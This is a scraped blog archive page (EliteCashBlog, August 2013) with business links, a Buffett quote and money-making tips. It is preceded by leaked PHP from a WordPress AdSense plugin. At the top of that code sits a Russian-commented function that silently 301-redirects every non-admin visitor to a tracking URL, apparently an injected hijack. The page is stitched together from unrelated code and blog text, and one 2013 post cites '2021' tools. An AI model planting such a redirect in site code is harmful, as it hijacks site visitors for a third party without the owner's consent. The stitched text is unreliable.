function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); if(!ADSENSEM_VERSION){die();} $_adsensem_networks['ad_adsense_classic'] = array( 'name' => 'AdSense (Classic)', 'shortname' => 'adc', 'www' => '', 'display' => false, ); /* INITIALISATION All functions in here called at startup (after other plugins have loaded, in case we need to wait for the widget-plugin). */ class Ad_AdSense_Classic extends Ad_AdSense { function Ad_AdSense_Classic(){ $this->Ad_AdSense(); } function network(){ return 'ad_adsense_classic'; } function save_settings_network() { if($_POST['adsensem-account-id']!=''){ $this->set_account_id(preg_replace('/\D/','',$_POST['adsensem-account-id'])); } $this->p['channel']=strip_tags(stripslashes($_POST['adsensem-channel'])); $this->p['adtype']=strip_tags(stripslashes($_POST['adsensem-adtype'])); $this->p['color-border']=strip_tags(stripslashes($_POST['adsensem-color-border'])); $this->p['color-title']=strip_tags(stripslashes($_POST['adsensem-color-title'])); $this->p['color-bg']=strip_tags(stripslashes($_POST['adsensem-color-bg'])); $this->p['color-text']=strip_tags(stripslashes($_POST['adsensem-color-text'])); $this->p['color-link']=strip_tags(stripslashes($_POST['adsensem-color-link'])); $this->p['uistyle']=strip_tags(stripslashes($_POST['adsensem-uistyle'])); if($_POST['adsensem-action']!='edit defaults'){ //Specific stuff for the ad/referral subtypes (cleaner) $this->save_settings_network_subtype(); } } //Processes the alternate ad options and returns correct code(complicated and needed across the adsense ads). function _render_color_code(){ $code=''; $code.= 'google_color_border = "' . $this->pd('color-border') . '"' . ";\n"; $code.= 'google_color_bg = "' . $this->pd('color-bg') . '"' . ";\n"; $code.= 'google_color_link = "' . $this->pd('color-title') . '"' . ";\n"; $code.= 'google_color_text = "' . $this->pd('color-text') . '"' . ";\n"; $code.= 'google_color_url = "' . $this->pd('color-link') . '"' . ";\n"; return $code; } function import_settings_network($code) { if(preg_match('/google_ad_channel = "(.*)"/', $code, $matches)!=0){ $_POST['adsensem-channel'] = $matches[1]; } if(preg_match('/google_color_border = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-border']=$matches[1];} if(preg_match('/google_color_bg = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-title']=$matches[1];} if(preg_match('/google_color_link = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-bg']=$matches[1];} if(preg_match('/google_color_text = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-text']=$matches[1];} if(preg_match('/google_color_url = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-link']=$matches[1];} $this->import_settings_network_subtype($code); //$this->save_settings(); now done in the main Ad_AdSense class } function import_detect_network($code){return false;} function _form_settings_styles(){ $default=array('' => 'Use Default'); $uistyle=array('0' => 'Square corners', '6' => 'Slightly rounded corners', '10' => 'Very rounded corners'); adsensem_admin::_field_select('Corner Style','uistyle',$uistyle); } function _form_settings_ad_format(){ //Google AdSense data $default=array('' => 'Use Default'); $adtypes=$this->_var_ad_types_available(); $formats=$this->_var_ad_formats_available(); //Get permitted formats for the current network adsensem_admin::_field_select('Ad Type','adtype',$adtypes); adsensem_admin::_field_select('Format','adformat',$formats); adsensem_admin::_field_input('Channel','channel',20,'Enter multiple Channels separated by + signs.'); } //Middle function _var_forms_unit(){ return array('ad_unit');} function _var_forms_column2(){ return array('colors','styles'); } //Show network-id on AdSense Classic function admin_manage_column1(){ adsensem_admin::dbxoutput($this->_var_forms_network()); adsensem_admin::dbxoutput($this->_var_forms_unit()); adsensem_admin::dbxoutput($this->_var_forms_column1()); } } require_once('class-adsense-ad.php'); //AdSense Ad units pre-slot style require_once('class-adsense-link.php'); //AdSense Link units pre-slot style require_once('class-adsense-referral.php'); //AdSense Referral units pre-slot style ?> EliteCashBlog » 2013 » August

21  Aug
MOO Business Cards

Looking for the perfect business card? Well, impress even the most resistant client with the many brilliant, creative options here at Moo.

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Posted by admin, filed under Business. Date: August 21, 2013, 1:01 pm | No Comments »

Seth Godin explains why magic plus generosity equals the brand crush here.

Posted by admin, filed under Business. Date: August 21, 2013, 12:54 pm | No Comments »

15  Aug
Potent Quote

“We only want to link up with people whom we like, admire, and trust. … We do not wish to join with managers who lack admirable qualities, no matter how attractive the prospects of their business. We’ve never succeeded in making a good deal with a bad person.”
– Warren E. Buffett

To the Shareholders of Berkshire Hathaway Inc.

Posted by admin, filed under Business. Date: August 15, 2013, 6:31 pm | No Comments »

Are you considering raising money? Then please read How To Convince Investors by Paul Graham here.

Posted by admin, filed under Business. Date: August 15, 2013, 5:36 pm | No Comments »

How do you tell your kid/s that you are dating? When and how should you introduce them? Click here for the full article and visit this site for EliteSinglesWithKids.

Posted by admin, filed under Dating. Date: August 15, 2013, 5:31 pm | No Comments »

15  Aug
StartUp Toolkit

Click this link to learn more about the Essential Software for Entrepreneurs: 7 Best Business Tools in 2021.

Posted by admin, filed under Business. Date: August 15, 2013, 5:11 pm | No Comments »

Read here and learn the benefits of getting comprehensive auto insurance and if you want to get one, check this site EliteInsurers.

Posted by admin, filed under Insurance. Date: August 14, 2013, 5:13 pm | No Comments »

In an era where cash still rules everything around me, everyone is still trying to figure out how to make a dollar out of fifteen cents. So here are five ways to create a little extra economic freedom:

1) Rent out your apartment: $700-$1,000 for a week. People feel like they are getting a deal when they get a room for less than $200 a night so imagine a fully furnished apartment! Backed up on bills or just need a break, stay with a family or close friend for a week and cash in when you get back home.

2) Still haven’t worn that clothing item with the price tags or have a piece of jewelry that you’re just not that into anymore or anything in good condition or relevant(concert tickets, etc.) Well I know you are probably aware of Ebay and Craigslist but it’s interesting to me how many people NEVER use these virtually free portals yet complain. So deem this as a reminder. It’s so easy – take clear pictures with your phone, think of a reasonable (and negotiable) price you would like to sell for, a quick description, and post. The worse thing that can happen is nothing. The best thing that can happen is more money for you.

3)Love to cook? Well then bank off of it. There are tons of people with loads of money who are dying for you to cook something flavorful for them because they either don’t feel like it or can’t. Create an amazing menu with a few scrumptious, healthy items. Create business cards and start putting your magic spell out there. Someone (or a family) out there is too busy (or lazy or just suck at cooking) to make dinner tonight and is waiting for you to make that mouthwatering meal.

4) They say you teach best what you need to learn the most. I say you teach best what pays you the most. Have a skill? Know how to play an instrument, play pool, dance, lose weight, swim, build a website, etc? Teach lessons or workshops or a group of 5 at a time and get paid. Are you a great writer? September is right around the corner and so are the college students who will hunt you down if you put yourself out there. Or are you one of those super handy individuals who can make laying down tiles or grouting a floor look as easy as making j-e-l-l-o. Hello! You better act like you know and let the world know your skills or teach someone else how to do it. Either way, most people crave being better at something. All you have to do is alert them to your availability. Get on your grind because someone else is cashing in on something that you have the same level (or better) of familiarity with while you are unhappily struggling for a measly paycheck. Get to it and don’t be afraid to ask for what you are worth. We live in a society where people believe the more they pay for something, the more significant the value. The last time I paid for a workshop it cost $395 per person and the very blunt facilitator at one point let us know that he just sprung $30,000 from us – in one day. Yes- no lie! Real talk, figure it out. Why can’t it be you?

5) Last but not least is the entrepreneur. You have that brilliant idea, that phenomenal product, that ‘thing’ that you believe in. Let us believe it too. You’ve run it by your family, friends, and even co-workers. Make it happen or guess what? Someone else will. My friend had a great idea for a lingerie boutique in the Dominican Republic since she knew the market as well as the demand at the time. Well, she talked about it more than she was being about it and now her ‘friend’ has opened up the same exact boutique she conceptualized. Grimy, yes. Unfortunately, no one truly cares about the sob story or the “I was going to do that” chatter. Like Tony Montana said, “The world is mine.” Act as if it is and watch what happens. Stop the overthinking. You can do it – the Universe is just waiting on you. Carpe Diem.

Posted by admin, filed under Financial Advice. Date: August 7, 2013, 4:43 pm | No Comments »